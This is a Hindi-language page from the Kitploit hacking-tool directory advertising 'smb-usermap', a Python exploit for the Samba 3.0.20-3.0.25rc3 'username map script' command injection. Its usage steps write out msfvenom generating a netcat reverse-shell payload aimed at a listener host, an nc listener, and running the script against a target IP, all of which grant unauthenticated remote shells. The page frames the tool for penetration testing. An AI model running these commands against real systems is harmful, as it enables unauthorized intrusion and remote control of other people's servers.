Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
smb-usermap — Samba 3.0.20-3.0.25rc3 'username map script' कमांड इंजेक्शन के लिए Python एक्सप्लॉइट, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन और रिवर्स शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/h3x0v3rl0rd/smb-usermap
शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubh3x0v3rl0rd/smb-usermap

smb-usermap

Samba 3.0.20-3.0.25rc3 'username map script' कमांड इंजेक्शन के लिए Python एक्सप्लॉइट, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन और रिवर्स शेल प्रदान करता है।

रिपॉजिटरी देखें
34 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सांबा "username map script" कमांड निष्पादन

यह मॉड्यूल सांबा संस्करण 3.0.20 से 3.0.25rc3 में एक कमांड निष्पादन भेद्यता का शोषण करता है, जब गैर-डिफ़ॉल्ट "username map script" कॉन्फ़िगरेशन विकल्प उपयोग में होता है। शेल मेटा वर्णों वाला उपयोगकर्ता नाम निर्दिष्ट करके, हमलावर मनमाने कमांड निष्पादित कर सकते हैं। इस भेद्यता का शोषण करने के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है, क्योंकि यह विकल्प प्रमाणीकरण से पहले उपयोगकर्ता नामों को मैप करने के लिए उपयोग किया जाता है!

  1. शेलकोड बनाएं
root@kitploit:~
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
  1. नेटकैट लिसनर
root@kitploit:~
nc -nlvp 5555
  1. स्क्रिप्ट चलाएं
root@kitploit:~
python3 smbusermap.py <Target IP>

image

टूल डाउनलोड करें